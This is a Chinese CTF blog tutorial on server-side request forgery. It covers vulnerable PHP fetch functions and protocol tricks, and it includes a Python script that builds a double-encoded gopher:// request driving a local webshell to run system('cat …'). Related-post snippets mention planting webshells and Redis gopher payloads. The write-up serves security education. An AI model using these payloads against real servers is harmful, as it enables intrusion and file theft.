CTF Web-SSRF

已于 2024-09-14 17:24:40 修改
阅读量29 收藏
点赞数
分类专栏: ctf 文章标签: 安全
于 2020-11-16 21:13:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44414845/article/details/109726047
版权

CTF Web-SSRF

  • 1.SSRF 常见场景:
  • 2.SSRF 常见后端实现
    • 2.1 file_get_contents
    • 2.2 fsockopen
    • 2.3 curl
    • 2.4 总结
  • 3.SSRF 利用思路
    • 3.1 利用Curl自带协议进行攻击
    • 3.2 利用SSRF攻击本地服务
    • 3.3 攻击数据库&缓存
      • 3.3.1 redis
      • 3.3.1 Memcached
      • 3.3.3 CouchDB
  • 4.SSRF 案例

1.SSRF 常见场景:

  • 能够对外发起网络请求的地方,就可能存在 SSRF 漏洞
  • 从远程服务器请求资源(Upload from URL,Import &Export RSS Feed)
  • 数据库内置功能(Oracle、MongoDB、MSSQL、Postgres、CouchDB)
  • Webmail 收取其他邮箱邮件(POP3、IMAP、SMTP)
  • 文件处理、编码处理、属性信息处理(ffmpeg、ImageMagic、DOCX、PDF、XML)
    在这里插入图片描述

2.SSRF 常见后端实现

2.1 file_get_contents

在这里插入图片描述
这段代码使用 file_get_contents 函数从用户指定的 URL 获取图片。然后把它用一个随机文件名保存在硬盘上,并展示给用户。

2.2 fsockopen

在这里插入图片描述
这段代码使用 fsockopen 函数实现获取用户指定 URL 的数据(文件或者 HTML)。这个函数会使用 socket 跟服务器建立 TCP 连接,传输原始数据。

2.3 curl

在这里插入图片描述
使用 curl 获取数据。

2.4 总结

高危函数:
file_get_contents()
fsockopen()
curl_exec()

区别:
大部分 PHP 并不会开启 fopen 的 gopher wrapper 。
file_get_contents 的 gopher 协议不能 URLencode 。
file_get_contents 关于 Gopher 的 302 跳转有 bug,导致利用失败 。
curl/libcurl 7.43 上 gopher 协议存在 bug(%00 截断),经测试 7.49 可用 。
curl_exec() //默认不跟踪跳转。
file_get_contents() // file_get_contents支持php://input协议。

3.SSRF 利用思路

3.1 利用Curl自带协议进行攻击

在这里插入图片描述

3.2 利用SSRF攻击本地服务

在这里插入图片描述

3.3 攻击数据库&缓存

3.3.1 redis

在这里插入图片描述

3.3.1 Memcached

在这里插入图片描述

3.3.3 CouchDB

在这里插入图片描述

4.SSRF 案例

访问题目如下:
在这里插入图片描述
dirsearch扫描发现robots.txt文件,可以看到webshell提示。
在这里插入图片描述
访问webshell
在这里插入图片描述
利用file协议读取webshell源码,发现必须是POST 协议,且必须从本地127.0.0.1发起。
在这里插入图片描述

根据webshell源码提示,本地搭建环境尝试利用
在这里插入图片描述
本地利用成功后,尝试使用gopher协议利用目标站点。这里注意由于是SSRF探测,是利用目标主机再次进行http请求。所以利用gopher发送数据包时候需要进行两次URL编码(以下test文件代表请求的http数据包)。
注释:
1.urllib.quote()是python url编码函数
2.将%0A替换为%0D%0A,是对因为BP中截取http请求包进行URL编码的时候,不会对换行编码为\r\n,而是\n,但http协议中的换行符是\r\n,所以需要进行转换。
3.gopher协议中,第一个字符是无效的,所以我们需要在数据包前加一个任意的字符,这里加的下划线 ‘_’。
4.Content-Length长度要根据具体情况变化。
在这里插入图片描述
exp如下:

import urllib
test = '''
POST /webshe11231231231.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=e1tlue40nk6gjkjiod5drl2t58
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

hacker=system('cat fl1234aaaaaggggg.php');&admin=h1admin
'''

tmp = urllib.quote(test)
new = tmp.replace('%0A','%0D%0A')

result = '_'+urllib.quote(new)
##gopher://127.0.0.1:80/result结果
print result;

利用exp生成访问的URL数据包
在这里插入图片描述
使用ls查看目录下有哪些文件

在这里插入图片描述
使用cat查看flag内容。
在这里插入图片描述

行者_Seven
关注
专栏目录
CTF -WEB-SSRF
weixin_71053667的博客
07-24 396
复制到地址框输入gopher://127.0.0.1:80/_,在后面加上复制的第二次编码,访问得到结果。将结果放入网址gopher://127.0.0.1:80/_,在后面加上复制的第二次编码,访问得到结果。5.编码后放入文本文档 %0A替换%0D%0A,最后在加上一个%0D%0A。2.根据题目得知将127限制了,可直接使用localhost得出答案。植入成功,使用菜刀,将网址输入后加shell.php -cmd。复制到记事本-把%0A替换为%0D%0A,并在末尾加%0A%0D。
CTFHub----WEB-SSRF全网最详细的保姆级教程!!!!!!
最新发布
2401_85783544的博客
07-24 1133
1.我们直接访问flag.php发现没有提交按钮,所以我们需要自己写一个按钮,前端的东西还是很容易修改 的, 把这个标签直接插入到下列html中去。2.在这里我们用的是第一个 file:///,去访问本地计算机中的文件,访问成功后看见有三个问号。file:///-------- 本地文件传输协议,主要用于访问本地计算机中的文件。3.,我们可以使用localhost来代替,也是本机的意思.成功获得flag。
CTFHUB-SSRF-302跳转 Bypass
weixin_68416970的博客
07-06 387
CTFHUB技能树、SSRF、302跳转 Bypass的通关教程
CTFHub-SSRF(全部)
1stPeak's Blog
08-01 3133
文章目录内网访问伪协议读取文件端口扫描POST请求 内网访问 解题步骤 伪协议读取文件 解题步骤 端口扫描 提示: 根据提示对目标端口进行爆破 注:使用字典也可以,用for循环写一个字典出来,还有就是爆破时线程不能太高,太高容易失败,无法爆出来 POST请求 注:中途靶机重启过一次,网址有些改变,不要在意,看payload即可 解题步骤 根据网上的一些内容,他共有3个php文件,分别是flag.php、302.php、index.php http://challenge-d01e92
CTFHub-Web-SSRF
IceCream的博客
04-29 1974
1.题目提示说访问127.0.0.1的flag.php,在URL后面添加路径没想到直接访问成功。
CTFHUB--SSRF详解
qq_49422880的博客
05-23 6829
SSRF详解SSRF漏洞介绍一、(内网访问、伪协议利用)1.1内网访问1.2伪协议读取文件1.3端口扫描二、(POST 上传文件 FastCGI协议 Redis协议)2.1 POST请求2.2 上传文件2.3 FastCGI协议2.4 Redis协议三、(Bypass系列)3.1 URL Bypass3.2 数字IP Bypass3.3 302跳转 Bypass3.4 DNS重绑定 Bypass SSRF漏洞介绍    SSRT(Server-Side Request Forgery,服务器端请求伪造),就
CTFHub-技能树-Web-SSRF
MCTSOG的博客
04-18 1086
CTFHub技能树-web-ssrf
web-ctfctf-pikachu-ssrf
一个努力生活的人的博客
08-23 1138
ctf-pikachu-ssrf
ctfhub -SSRF
weixin_55702959的博客
02-09 642
内网访问 SSRF(Server-Side Request Forgery:服务请求伪造)是一种由攻击者构造,从而让服务端发起请求的一种安全漏洞,它将一个可以发起网络请求的服务当作跳板来攻击其他服务,SSRF的攻击目标一般是内网。 ?url=127.0.0.1/flag.php 抓包 伪协议读取文件 https://blog.csdn.net/qq_39431542/article/details/89483887 php伪协议: File:// 访问本地文件系统 http:// 访问 H
CTFweb学习记录 -- SSRF
lifanxin的博客
06-29 1961
SSRF概述SSRF原理SSRF漏洞修复一道例题总结 概述   SSRF(Server-Side Request Forgery)服务器端请求伪造,是一种由攻击者构造请求,服务器端发起请求的安全漏洞。当然之所以要这样曲折,是因为SSRF的目标一般是外网无法访问的内部系统,所以需要用服务器端发送。 SSRF原理   SSRF形成的原因在于服务器端提供了从其它服务器应用获取数据的功能且没有对目标地址做过滤和限制。通过该漏洞我们可以攻击内网的服务器,获取相应的资源信息,利用file协议读取内部网络文件等。   如
CTFHUB-SSRF-Redis协议
qq_62078839的博客
04-23 2066
利用工具gopherus来生成payload 这里我们进行第二次url编码时,不需要再将%0a换为%0d%0a了,因为生成的payload已经替换了 gopher%3A//127.0.0.1%3A6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252432%250D%250A%250...
CTFHUB-WEB-SSRF【11】POST请求 上传文件 FastCGI协议 Redis协议
(∪.∪ )...zzz的博客
06-13 975
!!!POST请求试一下`?url=file:///var/www/html/flag.php`根据提示从127.0.0.1 访问给服务器发送一个KEY,写POST包上传文件FastCGI协议Redis协议 POST请求 试一下?url=file:///var/www/html/flag.php 根据提示从127.0.0.1 访问 给服务器发送一个KEY,写POST包 <!-- Debug: key=a977f452523073d3d7d2fd8bd41b5331--> 这个是基础po
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 3993
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
CTFHUB-web-SSRF
ookami6497的博客
03-25 887
CTFHUB-web-ssrf
常见文件上传漏洞利用
weixin_44414845的博客
12-14 4213
文件上传漏洞利用一、常见文件上传绕过方法1.javascript验证突破2.大小写突破3.服务器文件扩展名检测(不符合服务器端规定规则则不让上传)4.特殊后缀名绕过5.MIME类型6.文件内容检测7.图片马8.使用分布式配置9.文件截断10.编辑器漏洞1)ckfinder2)FCKeditor11.服务器解析漏洞1)apache解析漏洞未知后缀解析漏洞换行解析漏洞2)IIS6.0解析漏洞目录解析 ...
sql注入漏洞检测攻略
weixin_44414845的博客
12-14 2766
sql注入漏洞检测攻略一、如何判断1.基于报错的检验2.通过布尔的检验3.通过连接符+二、注入方式1.常规手工注入2.sqlmap注入3.宽字节注入 一、如何判断 1.基于报错的检验 输入’或者’’ 根据报错区分数据库类型 access Microsoft JET Database Engine JET mssql System.Data.SqlClient.SqlExc...
PC逆向入门
weixin_44414845的博客
11-10 1832
动静结合逆向程序举例 无明显main函数 有时,ida左边的分析栏中会遇到无明显main函数入口的情况,此时查找编译器入口(程序的起始点是编译器添加的入口,编译器初始化数据后,调用main函数,如果没有main函数,则只能从编译器入口着手)。 main函数传参有三个参数,所以通过查找3个push,1个call,定位编译器入口,从而定位main函数。 进入main函数后,我们发现有一个strcmp...
移动apk逆向入门
weixin_44414845的博客
11-10 855
移动apk逆向入门一、apk格式简介二、apk逆向工具(一)基本使用(二)smali语言三、逆向实例1.搜索关键词“无效的用户名和密码”2.通过资源文件中name值查找ID值3.找到ID值,查看程序哪里进行了引用4.搜索ID值,找到注册失败代码处5.利用同样方法,查找注册成功代码处6.点击咖啡杯,查看源码7.在Java源码中查找关键代码,通过关键字查找8.转为为10进制,因为咖啡杯中使用的就是10...
ctfhub SSRF
08-27
ctfhub是一个CTF训练平台,提供了多个CTF挑战模块,其中包括了SSRF模块。SSRF(Server-Side Request Forgery)是一种攻击技术,可以利用服务器端请求伪造漏洞来发送恶意请求。在ctfhub的SSRF模块中,你可以学习和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值